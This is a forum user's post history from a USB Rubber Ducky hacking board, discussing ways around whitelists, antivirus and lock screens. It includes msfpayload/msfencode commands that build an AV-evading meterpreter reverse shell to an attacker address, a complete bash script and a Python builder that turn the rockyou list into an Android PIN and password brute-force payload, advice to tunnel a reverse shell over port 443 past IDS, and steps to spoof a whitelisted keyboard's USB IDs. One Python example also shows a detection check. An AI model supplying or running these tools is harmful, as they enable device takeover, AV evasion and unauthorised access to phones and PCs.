CaptainHooligan
Posts: 12
Days Won: 1
Posts posted by CaptainHooligan
-
Not with version 2 firmware (normally the whitelist is based off VID & PID). Assuming you have a laptop, you can re-write vidpid.bin to support the VID & PID of a known device (obtainable from Device Manager on Win_X, or lsusb (usbutils package) (or at least dev) on Unix).
Bypass AV/HBSS for the win!
Good call! As always the more research you do on a target the better prepared you can be.
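The whitelist check the posts above are talking about, as an added example that is not part of any post or of the Ducky firmware: a small Python parser for `lsusb` output that flags devices whose VID:PID is not on an allow-list, then runs the same check after the HID device has been re-flashed to present the whitelisted keyboard's IDs. The `lsusb` lines are constructed for this example, not captured from a host, and the VID:PID values for the keyboard-emulating device are illustrative assumptions. The `duplicate_ids` check goes one step beyond the posts: a second "Dell keyboard" appearing on a one-keyboard host is a cheap signal a pure VID/PID whitelist does not give you.

```python
import re
from collections import Counter

# Constructed sample `lsusb` output for illustration; not captured from a
# real host. Device 003 is a keyboard-emulating device under its own IDs
# (illustrative values, not measured ones).
SAMPLE_LSUSB = """\
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 002: ID 413c:2003 Dell Computer Corp. Keyboard
Bus 001 Device 003: ID 03eb:2401 Atmel Corp. (keyboard-emulating device)
"""

# Same host after device 003 has been re-flashed to present the Dell
# keyboard's VID:PID (the vidpid.bin rewrite described in the post).
SPOOFED_LSUSB = SAMPLE_LSUSB.replace(
    "03eb:2401 Atmel Corp. (keyboard-emulating device)",
    "413c:2003 Dell Computer Corp. Keyboard",
)

# Allow-list keyed on (VID, PID), the way a hardware whitelist is keyed.
ALLOWED = {("1d6b", "0002"), ("413c", "2003")}

LSUSB_RE = re.compile(
    r"^Bus (?P<bus>\d{3}) Device (?P<dev>\d{3}): ID "
    r"(?P<vid>[0-9a-fA-F]{4}):(?P<pid>[0-9a-fA-F]{4})\s*(?P<desc>.*)$"
)


def parse_lsusb(text):
    """Parse `lsusb` lines into dicts; lines that do not match are skipped."""
    devices = []
    for line in text.splitlines():
        m = LSUSB_RE.match(line.strip())
        if m is None:
            continue
        d = m.groupdict()
        d["vid"] = d["vid"].lower()
        d["pid"] = d["pid"].lower()
        devices.append(d)
    return devices


def unlisted_devices(text, allowed):
    """Devices whose (VID, PID) is not on the allow-list: exactly what a
    VID/PID-based hardware whitelist would block."""
    return [d for d in parse_lsusb(text) if (d["vid"], d["pid"]) not in allowed]


def duplicate_ids(text):
    """(VID, PID) pairs seen more than once on the bus. Two 'identical'
    keyboards on a host that ships with one is worth an alert even though
    both pass the whitelist."""
    counts = Counter((d["vid"], d["pid"]) for d in parse_lsusb(text))
    return {k: n for k, n in counts.items() if n > 1}


if __name__ == "__main__":
    for label, text in (("as shipped", SAMPLE_LSUSB), ("spoofed", SPOOFED_LSUSB)):
        blocked = [d["dev"] for d in unlisted_devices(text, ALLOWED)]
        print(f"{label}: blocked devices {blocked}, duplicates {duplicate_ids(text)}")
```

Against the as-shipped listing the whitelist blocks device 003; against the spoofed listing it blocks nothing, and only the duplicate-ID check still notices that 413c:2003 is now plugged in twice.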
-
Great share! Just as mentioned above, some AV solutions include a Host-Based Security System (HBSS), which can whitelist hardware as well as software. In an environment that uses all Dell keyboards, or just specific ones that do not use generic drivers, this attack would be defeated.
-
That was pretty much the point I was trying to make: there is always a way to get around whatever security implementations you run into. The Duck does appear as a HID, which means whatever user limits we run into are what we have to deal with. If the security implementation has application whitelisting, the download will not matter as the .exe will not be allowed to run. Typically in a locked environment downloading is limited to power users or administrators.
Either way, know the environment and plan accordingly as there is always a way when thinking outside the box.
-
It doesn't really matter what limitations are set for users. There will always be some way to bypass security in one way or another. For example: a robust firewall solution combined with application whitelisting, limited permissions and USB mass storage disabled means you aren't going to be able to download a file, nor will you be able to bring one in.
-
This is a payload generator script. This is the first version and it currently only builds payloads to brute force android PINs and Passwords. Basically what it does is check to ensure prerequisites are met, then generates the payload selected. Right now it works and does what it says it's going to do. Enjoy and please send feedback on functions, etc.
Since I'm not able to upload the scripts themselves and it is over 900 lines of code it is hosted on an external link. You can download here:
https://docs.google.com/file/d/0B7P5FQhXHcvdeXZ1cDk3TUV2NFk/edit?usp=sharing
-
An easy thought is: can these PCs access the internet behind the routers and firewall? If so, just run a secure reverse shell over 443. Some IDS will look at the TCP stream and see the amount of traffic as anomalous, but most will see encrypted traffic and ignore it.
-
Check out dSploit. It is an open source project similar to this.
-
I've never had an issue when obfuscating code with msfencode. I just use two or three passes and use at least two encoders. For example:
[CODE]
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/countdown -c 5 -t exe -o payload.exe
[/CODE]
That sometimes still gets caught, which is when I use a custom template, which isn't too hard to do. Any Windows executable can be used as a template. Process Explorer is an easy one to get your hands on, and Sysinternals has a free download. All you need to do to run that is:
[CODE]
wget http://download.sysinternals.com/Files/ProcessExplorer.zip
unzip ProcessExplorer.zip
# procexp.exe is the Process Explorer executable from the zip
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -t exe -x procexp.exe -o payload.exe -e x86/shikata_ga_nai -c 5
[/CODE]
As was mentioned in previous posts, msfvenom is more updated than msfencode, but when using a custom template (any Windows executable) usually there is no problem at all bypassing AV.
-
Why not just use msfencode?
-
Another good thing to do would be to download the rockyou password list from skullsecurity. Take like the top 5000 out of it as it is already sorted by most frequently used to least. If a device is encrypted this will save you tons of time as there is no 5 password then wait limiter.
** Edit **
Here is a script that will grab rockyou.txt and create a payload for you in linux. Right now it does wait 30 seconds after every 5 passwords. I'm adding an option to not wait 30 seconds as if attacking the encryption logon screen.
[CODE]
#!/bin/bash
# Downloads the rockyou password list, takes the top 5000 entries and turns
# them into a USB Rubber Ducky payload (inject.bin) that tries each one on an
# Android lock screen, pausing after every fifth attempt for the lockout.
clear
echo -e "========================================================"
echo -e " This script downloads the rockyou password list"
echo -e " then takes the top 5000 passwords and generates"
echo -e " an Android brute forcer."
echo -e "========================================================"
echo -e " You need to have duckencode.jar installed as well"
echo -e " as bzip2 and wget."
echo -e "========================================================"
echo -e " This script is licensed under the GPLv3 and is"
echo -e " currently maintained by James Luther (CaptainHooligan)"
echo -e "========================================================"
echo ""
echo ""
if [ "$(id -u)" -ne 0 ] ; then
    echo "Sorry, you need super user access to run this script."
    exit 1
fi
echo -e "Verifying prerequisites are installed ... "
echo ""
# duckencode.jar is a jar, not a command on PATH, so locate it with find and
# hand the full path to java later (first match wins; permission errors
# from find are silenced).
duckjar=$(find / -name duckencode.jar -type f 2>/dev/null | head -n 1)
if [ -z "$duckjar" ] ; then
    echo "Duckencode.jar not found on system. Please verify you have this installed."
    exit 1
else
    echo "Duckencode.jar prerequisite met: $duckjar"
fi
# The remaining prerequisites are ordinary commands; java runs the encoder.
for tool in bzip2 wget java ; do
    if ! command -v "$tool" >/dev/null 2>&1 ; then
        echo "$tool not found on system. Please verify you have this installed."
        exit 1
    else
        echo "$tool prerequisite met."
    fi
done
echo ""
echo ""
#echo -e "Which do you want to attack?"
#echo -e " 1. Encryption Screen"
#echo -e " 2. Password Screen"
#read answer
#case answer
# 1)
echo -e "Verify connection to internet and press [Enter]."
read -r
echo ""
echo ""
echo -e "Downloading rockyou password list. This can take some time ..."
echo ""
echo ""
wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 || exit 1
bunzip2 rockyou.txt.bz2 || exit 1
echo ""
echo ""
echo -e "Creating rock-android.txt file ... "
echo ""
echo ""
# DuckyScript layout: an initial delay, then for each password
#   STRING <password> / DELAY 1000 / ENTER / ENTER
# and after every fifth password a lockout wait built from 5-second delays
# with ENTER between them to keep the screen awake. The WAIT marker is
# inserted on its own line and only that line is expanded, so a password
# containing the text WAIT is left alone. The first~step address (0~5)
# needs GNU sed.
echo "DELAY 5000" > rock-android.txt
head -n 5000 rockyou.txt \
    | sed -e 's/^/STRING /' \
    | sed '0~5 s/$/\nWAIT/' \
    | sed 's/$/\nDELAY 1000\nENTER\nENTER/' \
    | sed 's/^WAIT$/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/' \
    >> rock-android.txt
echo -e "rock-android.txt created!"
ls -lart rock-android.txt
echo ""
echo ""
echo -e "Creating inject.bin file ... "
java -jar "$duckjar" -i rock-android.txt -o inject.bin || exit 1
echo ""
echo ""
echo -e "Inject.bin created. Copy this over to your sdcard and enjoy!"
ls -lart inject.bin
[/CODE]
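The payload-building step of the post above, as an added example in Python that is not the author's script: the same top-N-of-rockyou idea as a configurable generator, with the "no wait" option the post says is being added. Assumptions, stated here and in the code: the lock screen refuses entries shorter than 4 characters, allows `attempts_per_lockout` wrong guesses before locking for `lockout_ms` (Android's lock screen: 5 attempts, then 30 seconds), needs one key press to get the input field back after the lockout, and the full-disk-encryption prompt has no such limiter, so `lockout_ms=0` drops the waits for that case. The wordlist is constructed for the example and stands in for the head of rockyou.txt; the generated file is fed to duckencode.jar exactly as in the script above.

```python
import re

# Constructed wordlist standing in for the head of rockyou.txt (not real
# file contents); it deliberately includes a duplicate, a three-character
# entry and a non-ASCII entry to exercise the filtering below.
SAMPLE_WORDLIST = """\
123456
12345
123456789
password
iloveyou
princess
1234567
rockyou
12345678
abc123
nicole
daniel
123456
abc
señor
""".splitlines()


def candidate_passwords(lines, min_len=4, limit=5000):
    """Keep the first `limit` usable entries in file order (rockyou is
    already sorted most- to least-common). Drops duplicates, entries shorter
    than the lock screen's minimum (assumed 4), and anything the keystroke
    encoder cannot type as plain printable ASCII."""
    seen = set()
    out = []
    for raw in lines:
        pw = raw.rstrip("\r\n")
        if len(pw) < min_len or not pw.isascii() or not pw.isprintable():
            continue
        if pw in seen:
            continue
        seen.add(pw)
        out.append(pw)
        if len(out) >= limit:
            break
    return out


def build_payload(passwords, attempts_per_lockout=5, lockout_ms=30000,
                  settle_ms=1000, initial_delay_ms=5000):
    """Return DuckyScript lines. After every `attempts_per_lockout` guesses
    the payload sleeps for `lockout_ms` and presses ENTER once to get the
    input field back (an assumption about the lock screen). lockout_ms=0
    turns the waits off for a prompt with no throttling, such as the
    encryption screen."""
    lines = [f"DELAY {initial_delay_ms}"]
    for i, pw in enumerate(passwords, start=1):
        lines.append(f"STRING {pw}")
        lines.append("ENTER")
        lines.append(f"DELAY {settle_ms}")
        if lockout_ms and i % attempts_per_lockout == 0 and i < len(passwords):
            lines.append(f"DELAY {lockout_ms}")
            lines.append("ENTER")
    return lines


def total_delay_ms(lines):
    """Sum of every DELAY in the script: a lower bound on run time, since the
    time the Ducky spends typing is not counted."""
    total = 0
    for line in lines:
        m = re.fullmatch(r"DELAY (\d+)", line)
        if m:
            total += int(m.group(1))
    return total


if __name__ == "__main__":
    pws = candidate_passwords(SAMPLE_WORDLIST)
    for name, lockout in (("lock screen", 30000), ("encryption prompt", 0)):
        script = build_payload(pws, lockout_ms=lockout)
        print(f"{name}: {len(script)} lines, at least "
              f"{total_delay_ms(script) // 1000}s of delays")
    # Then: java -jar duckencode.jar -i rock-android.txt -o inject.bin
    with open("rock-android.txt", "w", encoding="ascii") as fh:
        fh.write("\n".join(build_payload(pws)) + "\n")
```

`total_delay_ms` is the number to look at before committing to 5000 entries: at 5 attempts per 30-second lockout that is 999 lockouts, about 8.3 hours of waiting before any typing time, which is the cost the post's "no 5 password then wait limiter" remark is about.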
[Release] Simple-Ducky Payload Generator v1.1.1 (International Key Mapping|Kali Compatible|Custom Payload Builder)
in Classic USB Rubber Ducky
Posted · Edited by CaptainHooligan
Awesome work! I started a project exactly like this a couple months ago but work struck and I haven't had time to maintain it. Below is the code for the pseudo framework shell script I wrote. Maybe you can digest it into your setup to add graphical menus with the dialog commands I used. You could also use zenity.